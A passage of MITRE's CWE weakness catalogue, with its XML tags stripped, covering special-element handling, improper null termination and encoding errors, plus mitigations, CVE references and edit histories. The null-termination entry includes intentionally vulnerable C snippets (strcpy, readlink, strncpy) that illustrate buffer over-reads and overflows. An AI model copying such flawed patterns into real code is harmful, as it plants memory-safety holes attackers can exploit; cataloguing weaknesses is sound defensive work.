looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Trailing Special Element - - - SFP24 - Tainted input to command - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Trailing Special Element - Failure to Sanitize Trailing Special Element - Improper Sanitization of Trailing Special Elements - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component. - As data is parsed, improperly handled multiple trailing special elements may cause the process to take unexpected actions that result in an attack. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that multiple trailing special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Multiple Trailing Special Elements - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Multiple Trailing Special Elements - Failure to Sanitize Multiple Trailing Special Elements - Improper Sanitization of Multiple Trailing Special Elements - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component. - As data is parsed, improperly handled internal special elements may cause the process to take unexpected actions that result in an attack. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that internal special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Internal Special Element - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Internal Special Element - Failure to Sanitize Internal Special Element - Improper Sanitization of Internal Special Elements - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component. - As data is parsed, improperly handled multiple internal special elements may cause the process to take unexpected actions that result in an attack. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that multiple internal special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Multiple Internal Special Element - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Multiple Internal Special Elements - Failure to Sanitize Multiple Internal Special Elements - Improper Sanitization of Multiple Internal Special Elements - - - - The software receives input from an upstream component, but it does not handle or incorrectly handles when an expected special element is missing. - - - - - - - - - - Implementation - - - - - Availability - DoS: Crash, Exit, or Restart - - - - - Developers should anticipate that special elements will be removed in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-1362 - Crash via message type without separator character - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1362 - - - CVE-2002-0729 - Missing special character (separator) causes crash - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0729 - - - CVE-2002-1532 - HTTP GET without \r\n\r\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1532 - - - - - Missing Special Element - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Missing Special Element - Failure to Handle Missing Special Element - - - - The software receives input from an upstream component, but it does not handle or incorrectly handles when an additional unexpected special element is provided. - - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that extra special elements will be injected in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2000-0116 - Extra "<" in front of SCRIPT tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0116 - - - CVE-2001-1157 - Extra "<" in front of SCRIPT tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157 - - - CVE-2002-2086 - "<script" - probably a cleansing error - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2086 - - - - - Extra Special Element - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Extra Special Element - Failure to Handle Additional Special Element - - - - The software does not properly handle input in which an inconsistency exists between two or more special characters or reserved words. - An example of this problem would be if paired characters appear in the wrong order, or if the special characters are not properly nested. - - - - - - - - - - Implementation - - - - - Availability - Access Control - Non-Repudiation - DoS: Crash, Exit, or Restart - Bypass Protection Mechanism - Hide Activities - - - - - Developers should anticipate that inconsistent special elements will be injected/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Inconsistent Special Elements - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Inconsistent Special Elements - Failure to Resolve Inconsistent Special Elements - - - - The software does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator. - Null termination errors frequently occur in two different ways. An off-by-one error could cause a null to be written out of bounds, leading to an overflow. Or, a program could use a strncpy() function call incorrectly, which prevents a null terminator from being added at all. Other scenarios are possible. - - - - - - - - - - - - Resultant - - - - - - - - - Implementation - - - Medium - - - Confidentiality - Integrity - Availability - Read Memory - Execute Unauthorized Code or Commands - The case of an omitted null character is the most dangerous of the possible issues. This will almost certainly result in information disclosure, and possibly a buffer overflow condition, which may be exploited to execute arbitrary code. - - - Confidentiality - Integrity - Availability - DoS: Crash, Exit, or Restart - Read Memory - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - If a null character is omitted from a string, then most string-copying functions will read data until they locate a null character, even outside of the intended boundaries of the string. This could: cause a crash due to a segmentation fault cause sensitive adjacent memory to be copied and sent to an outsider trigger a buffer overflow when the copy is being written to a fixed-size buffer. - - - Integrity - Availability - Modify Memory - DoS: Crash, Exit, or Restart - Misplaced null characters may result in any number of security problems. The biggest issue is a subset of buffer overflow, and write-what-where conditions, where data corruption occurs from the writing of a null character over valid data, or even instructions. A randomly placed null character may put the system into an undefined state, and therefore make it prone to crashing. A misplaced null character may corrupt other data in memory. - - - Integrity - Confidentiality - Availability - Access Control - Other - Alter Execution Logic - Execute Unauthorized Code or Commands - Should the null character corrupt the process flow, or affect a flag controlling access, it may lead to logical errors which allow for the execution of arbitrary code. - - - - - Requirements - Use a language that is not susceptible to these issues. However, be careful of null byte interaction errors (CWE-626) with lower-level constructs that may be written in a language that is susceptible. - - - Implementation - Ensure that all string functions used are understood fully as to how they append null characters. Also, be wary of off-by-one errors when appending nulls to the end of strings. - - - Implementation - If performance constraints permit, special code can be added that validates null-termination of string buffers, this is a rather naive and error-prone solution. - - - Implementation - Switch to bounded string manipulation functions. Inspect buffer lengths involved in the buffer overrun trace reported with the defect. - - - Implementation - Add code that fills buffers with nulls (however, the length of buffers still needs to be inspected, to ensure that the non null-terminated string is not written at the physical end of the buffer). - - - - - The following code reads from cfgfile and copies the input into inputbuf using strcpy(). The code mistakenly assumes that inputbuf will always contain a NULL terminator. - - #define MAXLEN 1024...char *pathbuf[MAXLEN];...read(cfgfile,inputbuf,MAXLEN); //does not null terminatestrcpy(pathbuf,inputbuf); //requires null terminated input... - - The code above will behave correctly if the data read from cfgfile is null terminated on disk as expected. But if an attacker is able to modify this input so that it does not contain the expected NULL character, the call to strcpy() will continue copying from memory until it encounters an arbitrary NULL character. This will likely overflow the destination buffer and, if the attacker can control the contents of memory immediately following inputbuf, can leave the application susceptible to a buffer overflow attack. - - - In the following code, readlink() expands the name of a symbolic link stored in pathname and puts the absolute path into buf. The length of the resulting value is then calculated using strlen(). - - char buf[MAXPATH];...readlink(pathname, buf, MAXPATH);int length = strlen(buf);... - - The code above will not always behave correctly as readlink() does not append a NULL byte to buf. Readlink() will stop copying characters once the maximum size of buf has been reached to avoid overflowing the buffer, this will leave the value buf not NULL terminated. In this situation, strlen() will continue traversing memory until it encounters an arbitrary NULL character further on down the stack, resulting in a length value that is much larger than the size of string. Readlink() does return the number of bytes copied, but when this return value is the same as stated buf size (in this case MAXPATH), it is impossible to know whether the pathname is precisely that many bytes long, or whether readlink() has truncated the name to avoid overrunning the buffer. In testing, vulnerabilities like this one might not be caught because the unused contents of buf and the memory immediately following it may be NULL, thereby causing strlen() to appear as if it is behaving correctly. - - - While the following example is not exploitable, it provides a good example of how nulls can be omitted or misplaced, even when "safe" functions are used: - - #include <stdio.h>#include <string.h> - int main() { - - char longString[] = "String signifying nothing";char shortString[16]; - strncpy(shortString, longString, 16);printf("The last character in shortString is: %c (%1$x)\n", shortString[15]);return (0); - } - - The above code gives the following output: "The last character in shortString is: n (6e)". So, the shortString array does not end in a NULL character, even though the "safe" string function strncpy() was used. The reason is that strncpy() does not impliciitly add a NULL character at the end of the string when the source is equal in length or longer than the provided size. - - - - - CVE-2000-0312 - Attacker does not null-terminate argv[] when invoking another program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0312 - - - CVE-2003-0777 - Interrupted step causes resultant lack of null termination. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0777 - - - CVE-2004-1072 - Fault causes resultant lack of null termination, leading to buffer expansion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1072 - - - CVE-2001-1389 - Multiple vulnerabilities related to improper null termination. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1389 - - - CVE-2003-0143 - Product does not null terminate a message buffer after snprintf-like call, leading to overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0143 - - - CVE-2009-2523 - Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523 - - - - - Improper Null Termination - - - String Termination Error - - - Miscalculated null termination - - - A9 - Denial of Service - CWE More Specific - - - POS30-C - Use the readlink() function properly - CWE More Abstract - - - STR03-C - Do not inadvertently truncate a null-terminated byte string - - - STR32-C - Do not pass a non-null-terminated character sequence to a library function that expects a string - Exact - - - SFP11 - Improper Null Termination - - - - Factors: this is usually resultant from other weaknesses such as off-by-one errors, but it can be primary to boundary condition violations such as buffer overflows. In buffer overflows, it can act as an expander for assumed-immutable data. - Overlaps missing input terminator. - - Conceptually, this does not just apply to the C language; any language or representation that involves a terminator could have this type of problem. - - As currently described, this entry is more like a category than a weakness. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Common_Consequences - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Other_Notes, Potential_Mitigations, White_Box_Definitions - - - CWE Content Team - MITRE - 2009-10-29 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2018-03-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software does not properly encode or decode the data, resulting in unexpected values. - - - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Encoding Error - - - - - - - - - - - - - - - - Partially overlaps path traversal and equivalence weaknesses. - This is more like a category than a weakness. - Many other types of encodings should be listed in this category. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - 